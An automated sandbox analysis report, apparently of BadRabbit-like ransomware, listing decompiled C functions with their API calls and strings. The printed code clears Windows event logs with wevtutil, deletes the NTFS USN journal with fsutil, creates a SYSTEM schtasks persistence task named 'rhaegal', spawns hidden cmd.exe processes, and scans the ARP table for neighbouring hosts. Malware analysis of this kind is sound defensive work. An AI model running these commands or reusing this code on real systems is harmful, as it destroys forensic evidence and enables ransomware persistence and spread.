                                                                                                                                                                                        • htonl.WS2_32(74656490), ref: 007B8AE1
                                                                                                                                                                                        • inet_ntoa.WS2_32(00000000), ref: 007B8AE4
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 007B8B02
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 007B8B09
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 007B8B1F
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FreeHeapMetricsSleepSystemhtonl$EventLocalProcessinet_ntoa
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 4223591894-3175316637
                                                                                                                                                                                        • Opcode ID: 3e89531e7657b09f8dc62c937cf1d0f17200dc4ecf72110b9b9e421543858e3d
                                                                                                                                                                                        • Instruction ID: c4aab4b57e9a61672882a4f1442ff98d7cb548c86bffca7666a8b8dbbd41cf3d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e89531e7657b09f8dc62c937cf1d0f17200dc4ecf72110b9b9e421543858e3d
                                                                                                                                                                                        • Instruction Fuzzy Hash: CF118EB1600309BBDB20AFB5CC88E9FBAACEF483407148525F501A7111EA7CED01CAA5
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                        			E007B808E() {
                                                                                                                                                                                        				short _v524;
                                                                                                                                                                                        				short _v526;
                                                                                                                                                                                        				short _v2572;
                                                                                                                                                                                        				void _t22;
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        				signed int _t32;
                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                        				WCHAR* _t38;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v524 = 0;
                                                                                                                                                                                        				_t38 = L"%wswevtutil cl %ws & ";
                                                                                                                                                                                        				wsprintfW( &_v524, _t38,  &_v524, L"Setup");
                                                                                                                                                                                        				wsprintfW( &_v524, _t38,  &_v524, L"System");
                                                                                                                                                                                        				wsprintfW( &_v524, _t38,  &_v524, L"Security");
                                                                                                                                                                                        				wsprintfW( &_v524, _t38,  &_v524, L"Application");
                                                                                                                                                                                        				_t35 =  &_v524 - 2;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t22 =  *(_t35 + 2);
                                                                                                                                                                                        					_t35 = _t35 + 2;
                                                                                                                                                                                        				} while (_t22 != 0);
                                                                                                                                                                                        				_t32 = 0x10;
                                                                                                                                                                                        				_push( *0x7c7bc8 & 0x0000ffff);
                                                                                                                                                                                        				memcpy(_t35, L"fsutil usn deletejournal /D %c:", _t32 << 2);
                                                                                                                                                                                        				wsprintfW( &_v2572,  &_v524);
                                                                                                                                                                                        				_v526 = 0;
                                                                                                                                                                                        				_t30 = E007B7FB7( &_v2572, 3); // executed
                                                                                                                                                                                        				return _t30;
                                                                                                                                                                                        			}












                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: wsprintf
                                                                                                                                                                                        • String ID: %wswevtutil cl %ws & $Application$Security$Setup$System$fsutil usn deletejournal /D %c:
                                                                                                                                                                                        • API String ID: 2111968516-1905612841
                                                                                                                                                                                        • Opcode ID: a47365f2eda8eec2a2fecfc178d50168e7be4181d0a3516c274f6693734e331f
                                                                                                                                                                                        • Instruction ID: 9819ebe36d80df8897be1b94331e0f3a134aa0169bddb4f24d7e4f8b3ea0164b
                                                                                                                                                                                        • Opcode Fuzzy Hash: a47365f2eda8eec2a2fecfc178d50168e7be4181d0a3516c274f6693734e331f
                                                                                                                                                                                        • Instruction Fuzzy Hash: BE1186A6A003286ACB60D7A48C89FE777BCEF45750F4005B5F958D3141EA78DE84CB79
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                        			E007B6E66(void* __ecx, struct _CRITICAL_SECTION* _a4, void* _a8, intOrPtr _a12) {
                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        				void* _t56;
                                                                                                                                                                                        				signed int _t57;
                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                        				struct _CRITICAL_SECTION* _t82;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_t82 = _a4;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				if(_t82 == 0 || _a8 == 0) {
                                                                                                                                                                                        					L11:
                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					EnterCriticalSection(_t82);
                                                                                                                                                                                        					_t46 = E007B6DA4(0, _t67, _t82, _a8, 0); // executed
                                                                                                                                                                                        					if(_t46 == 0) {
                                                                                                                                                                                        						_t68 =  *(_t82 + 0x20);
                                                                                                                                                                                        						if( *(_t82 + 0x24) >=  *(_t82 + 0x20)) {
                                                                                                                                                                                        							_t51 = HeapReAlloc(GetProcessHeap(), 8,  *(_t82 + 0x18), 0x3fc +  *(_t82 + 0x20) * 4);
                                                                                                                                                                                        							if(_t51 != 0) {
                                                                                                                                                                                        								 *(_t82 + 0x18) = _t51;
                                                                                                                                                                                        								 *(_t82 + 0x20) =  *(_t82 + 0x20) + 0xff;
                                                                                                                                                                                        								_v8 = E007B6E66(_t68, _t82, _a8, _a12);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t54 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                                                        							 *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4) = _t54;
                                                                                                                                                                                        							if(_t54 != 0) {
                                                                                                                                                                                        								_t56 = HeapAlloc(GetProcessHeap(), 8,  *(_t82 + 0x1c));
                                                                                                                                                                                        								 *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)) = _t56;
                                                                                                                                                                                        								_t57 =  *(_t82 + 0x24);
                                                                                                                                                                                        								_t72 =  *(_t82 + 0x18);
                                                                                                                                                                                        								if(_t56 == 0) {
                                                                                                                                                                                        									HeapFree(GetProcessHeap(), 0,  *(_t72 + _t57 * 4));
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									 *((intOrPtr*)( *(_t72 + _t57 * 4) + 4)) = _a12;
                                                                                                                                                                                        									memcpy( *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)), _a8,  *(_t82 + 0x1c));
                                                                                                                                                                                        									 *(_t82 + 0x24) =  *(_t82 + 0x24) + 1;
                                                                                                                                                                                        									_v8 = 1;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					LeaveCriticalSection(_t82);
                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}













                                                                                                                                                                                        APIs
                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,74655520,74654F20,?,?,007B6A84,?,?,?), ref: 007B6E87
                                                                                                                                                                                          • Part of subcall function 007B6DA4: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,007B6E98,?,00000000,?,?,007B6A84,?,?), ref: 007B6DB5
                                                                                                                                                                                          • Part of subcall function 007B6DA4: LeaveCriticalSection.KERNEL32(?,?,?,007B6E98,?,00000000,?,?,007B6A84,?,?), ref: 007B6E0C
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008,?,00000000,?,?,007B6A84,?,?,?), ref: 007B6EB8
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,007B6A84,?,?,?), ref: 007B6EC1
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,007B6A84,?,?,?), ref: 007B6ED9
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,007B6A84,?,?,?), ref: 007B6EDC
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B6F0D
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,007B6A84,?,?,?), ref: 007B6F26
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,007B6A84,?,?,?), ref: 007B6F29
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,?,007B6A84,?,?,?), ref: 007B6F41
                                                                                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,007B6A84,?,?,?), ref: 007B6F48
                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,007B6A84,?,?,?), ref: 007B6F6C
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$CriticalProcessSection$Alloc$EnterLeave$Freememcpy
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 1369668251-3175316637
                                                                                                                                                                                        • Opcode ID: 9ef480a92535dd72b28af5bc516cec3ac2a27d6f7c61b760577f9854683be356
                                                                                                                                                                                        • Instruction ID: c1a630b33e5efc5bf322cdb84d19aa0f4f58b31c5a9fd5892902aeab2ae1376d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ef480a92535dd72b28af5bc516cec3ac2a27d6f7c61b760577f9854683be356
                                                                                                                                                                                        • Instruction Fuzzy Hash: 47315C71600A05EFCB219FA9DC44EAAB7F6FF88304B108618FA4687651DB39E911CF54
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 25%
                                                                                                                                                                                        			E007B742C(intOrPtr _a4) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                        				short _v88;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                        				signed char* _t46;
                                                                                                                                                                                        				long _t49;
                                                                                                                                                                                        				intOrPtr* _t51;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t51 = __imp__GetIpNetTable;
                                                                                                                                                                                        				_t49 = 0;
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_t24 =  *_t51(0,  &_v8, 0); // executed
                                                                                                                                                                                        				if(_t24 != 0xe8) {
                                                                                                                                                                                        					if(_t24 != 0x7a) {
                                                                                                                                                                                        						L15:
                                                                                                                                                                                        						return _v20;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t44 = HeapAlloc(GetProcessHeap(), 0, _v8);
                                                                                                                                                                                        					_v16 = _t44;
                                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                                        						L14:
                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t29 =  *_t51(_t44,  &_v8, 0); // executed
                                                                                                                                                                                        					if(_t29 != 0) {
                                                                                                                                                                                        						L13:
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), _t49, _t44);
                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v20 = 1;
                                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                                        					if( *_t44 <= 0) {
                                                                                                                                                                                        						goto L13;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v24 = 3;
                                                                                                                                                                                        					_t46 = _t44 + 0x16;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_push(4);
                                                                                                                                                                                        						asm("repe cmpsb");
                                                                                                                                                                                        						if(0 != 0) {
                                                                                                                                                                                        							asm("sbb eax, eax");
                                                                                                                                                                                        							asm("sbb eax, 0xffffffff");
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(0 == 0) {
                                                                                                                                                                                        							wsprintfW( &_v88, L"%u.%u.%u.%u",  *(_t46 - 2) & 0x000000ff,  *(_t46 - 1) & 0x000000ff,  *_t46 & 0x000000ff, _t46[1] & 0x000000ff);
                                                                                                                                                                                        							_t54 = _t54 + 0x18;
                                                                                                                                                                                        							E007B6B95( &_v88, 0, _a4);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                                                                        						_t33 = _v16;
                                                                                                                                                                                        						_t46 =  &(_t46[0x18]);
                                                                                                                                                                                        					} while (_v12 <  *_t33);
                                                                                                                                                                                        					_t44 = _t33;
                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}



















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 007B7448
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 007B7466
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B746D
                                                                                                                                                                                        • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 007B7486
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B74D8
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B7504
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B750B
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$ProcessTable$AllocFreewsprintf
                                                                                                                                                                                        • String ID: Oet Uet0Xet$%u.%u.%u.%u
                                                                                                                                                                                        • API String ID: 2259129056-2591814563
                                                                                                                                                                                        • Opcode ID: 463304b040997963d147ee4d5bc4cb42400cfca7ffca7fbd34b80c5f917247ad
                                                                                                                                                                                        • Instruction ID: 2a3a4d441e02ca4c6240f9a2d2e69b0d03f8912957c02186cde612cc20edf5f3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 463304b040997963d147ee4d5bc4cb42400cfca7ffca7fbd34b80c5f917247ad
                                                                                                                                                                                        • Instruction Fuzzy Hash: FB319EB2900159ABCF218FA8CD84EFEBBBCFF89305F144556E901E6141E63C9A05DB60
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B7FB7(intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                                        				struct _STARTUPINFOW _v88;
                                                                                                                                                                                        				short _v1648;
                                                                                                                                                                                        				short _v1650;
                                                                                                                                                                                        				short _v3696;
                                                                                                                                                                                        				char* _t20;
                                                                                                                                                                                        				char* _t21;
                                                                                                                                                                                        				int _t26;
                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                        				long _t37;
                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t38 = 0;
                                                                                                                                                                                        				wsprintfW( &_v3696, L"/c %ws", _a4);
                                                                                                                                                                                        				_v1650 = 0;
                                                                                                                                                                                        				if(GetEnvironmentVariableW(L"ComSpec",  &_v1648, 0x30c) != 0 || GetSystemDirectoryW( &_v1648, 0x30c) != 0 && lstrcatW( &_v1648, L"\\cmd.exe") != 0) {
                                                                                                                                                                                        					_t35 = 0x10;
                                                                                                                                                                                        					_t20 =  &_v20;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						 *_t20 = 0;
                                                                                                                                                                                        						_t20 = _t20 + 1;
                                                                                                                                                                                        						_t35 = _t35 - 1;
                                                                                                                                                                                        					} while (_t35 != 0);
                                                                                                                                                                                        					_t36 = 0x44;
                                                                                                                                                                                        					_t37 = _t36;
                                                                                                                                                                                        					_t21 =  &_v88;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						 *_t21 = 0;
                                                                                                                                                                                        						_t21 = _t21 + 1;
                                                                                                                                                                                        						_t37 = _t37 - 1;
                                                                                                                                                                                        					} while (_t37 != 0);
                                                                                                                                                                                        					_v88.cb = _t36;
                                                                                                                                                                                        					_t26 = CreateProcessW( &_v1648,  &_v3696, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20); // executed
                                                                                                                                                                                        					_t38 = _t26;
                                                                                                                                                                                        					if(_t38 != 0) {
                                                                                                                                                                                        						Sleep(_a8 * 0x3e8); // executed
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					L9:
                                                                                                                                                                                        					return _t38;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}
















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B7FD6
                                                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 007B7FFA
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B800C
                                                                                                                                                                                        • lstrcatW.KERNEL32(?,\cmd.exe), ref: 007B8022
                                                                                                                                                                                        • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 007B8069
                                                                                                                                                                                        • Sleep.KERNELBASE(00000000), ref: 007B807F
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateDirectoryEnvironmentProcessSleepSystemVariablelstrcatwsprintf
                                                                                                                                                                                        • String ID: /c %ws$ComSpec$\cmd.exe
                                                                                                                                                                                        • API String ID: 1518394870-1564754240
                                                                                                                                                                                        • Opcode ID: c7f842ffd8e5a92ec06481a24383b36b23d47aaa903a6aed69c7c3c8a050c076
                                                                                                                                                                                        • Instruction ID: e655dac9bccb08abd64dc6ed4d1758cad942a301d8f74bb6d23fc6f569059140
                                                                                                                                                                                        • Opcode Fuzzy Hash: c7f842ffd8e5a92ec06481a24383b36b23d47aaa903a6aed69c7c3c8a050c076
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7321A4B260014DAFDB20EBA4DC88FEB77ADEB94341F048566F545E6140FA39CE48CB61
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B1000(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                        				short _v524;
                                                                                                                                                                                        				short _v1564;
                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t21 = 0;
                                                                                                                                                                                        				_t8 = E007B7FB7(L"schtasks /Delete /F /TN rhaegal", 0); // executed
                                                                                                                                                                                        				if(_t8 != 0) {
                                                                                                                                                                                        					Sleep(0x7d0); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(GetEnvironmentVariableW(L"ComSpec",  &_v524, 0x104) != 0 || GetSystemDirectoryW( &_v524, 0x104) != 0 && lstrcatW( &_v524, L"\\cmd.exe") != 0) {
                                                                                                                                                                                        					wsprintfW( &_v1564, L"schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"",  &_v524, _a4,  *0x7c7bbc);
                                                                                                                                                                                        					_t15 = E007B7FB7( &_v1564, _t21); // executed
                                                                                                                                                                                        					_t21 = _t15;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t21;
                                                                                                                                                                                        			}









                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 007B7FB7: wsprintfW.USER32 ref: 007B7FD6
                                                                                                                                                                                          • Part of subcall function 007B7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 007B7FFA
                                                                                                                                                                                          • Part of subcall function 007B7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B800C
                                                                                                                                                                                          • Part of subcall function 007B7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 007B8022
                                                                                                                                                                                          • Part of subcall function 007B7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 007B8069
                                                                                                                                                                                          • Part of subcall function 007B7FB7: Sleep.KERNELBASE(00000000), ref: 007B807F
                                                                                                                                                                                        • Sleep.KERNELBASE(000007D0,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 007B1021
                                                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 007B1039
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007B104B
                                                                                                                                                                                        • lstrcatW.KERNEL32(?,\cmd.exe), ref: 007B1061
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B1087
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • \cmd.exe, xrefs: 007B1055
                                                                                                                                                                                        • schtasks /Delete /F /TN rhaegal, xrefs: 007B100E
                                                                                                                                                                                        • ComSpec, xrefs: 007B1034
                                                                                                                                                                                        • schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit", xrefs: 007B1081
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DirectoryEnvironmentSleepSystemVariablelstrcatwsprintf$CreateProcess
                                                                                                                                                                                        • String ID: ComSpec$\cmd.exe$schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit"$schtasks /Delete /F /TN rhaegal
                                                                                                                                                                                        • API String ID: 2538701606-2521368254
                                                                                                                                                                                        • Opcode ID: 3cbadc3f9139ca0f730f8d677ca97e78105540cd8a8326f47e5b6e198c86b2e2
                                                                                                                                                                                        • Instruction ID: 44d9b0b727c1f45d3d63726a29a472582ae6093fc1ee98d47c065980cc7c0e2b
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cbadc3f9139ca0f730f8d677ca97e78105540cd8a8326f47e5b6e198c86b2e2
                                                                                                                                                                                        • Instruction Fuzzy Hash: C30180B6600258AACB20ABB59C0DFD7776DEB84701F404165B905E2151EA78CA85CAB4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                        			E007B11EF(int _a4, short* _a8) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                        				char _v2064;
                                                                                                                                                                                        				long _t42;
                                                                                                                                                                                        				intOrPtr* _t43;
                                                                                                                                                                                        				long _t49;
                                                                                                                                                                                        				long _t60;
                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                        				char* _t63;
                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                        				intOrPtr _t70;
                                                                                                                                                                                        				intOrPtr* _t71;
                                                                                                                                                                                        				char _t72;
                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                        				void* _t74;
                                                                                                                                                                                        				char _t75;
                                                                                                                                                                                        				char* _t76;
                                                                                                                                                                                        				char _t77;
                                                                                                                                                                                        				char* _t79;
                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t42 = RegOpenKeyW(0x80000002, _a4,  &_v12); // executed
                                                                                                                                                                                        				if(_t42 != 0) {
                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t43 = L"cscc";
                                                                                                                                                                                        				_t74 = _t43 + 2;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t70 =  *_t43;
                                                                                                                                                                                        					_t43 = _t43 + 2;
                                                                                                                                                                                        				} while (_t70 != 0);
                                                                                                                                                                                        				_t68 = (_t43 - _t74 >> 1) + (_t43 - _t74 >> 1) + 2;
                                                                                                                                                                                        				_t79 =  &_v2064;
                                                                                                                                                                                        				_a4 = 0x800;
                                                                                                                                                                                        				_t49 = RegQueryValueExW(_v12, _a8, 0,  &_v16, _t79,  &_a4); // executed
                                                                                                                                                                                        				_v8 = _t49;
                                                                                                                                                                                        				if(_t49 == 0) {
                                                                                                                                                                                        					if(_v16 != 7 || _a4 + _t68 > 0x800) {
                                                                                                                                                                                        						_v8 = 0x65d;
                                                                                                                                                                                        						goto L23;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						if(_v2064 == 0) {
                                                                                                                                                                                        							L20:
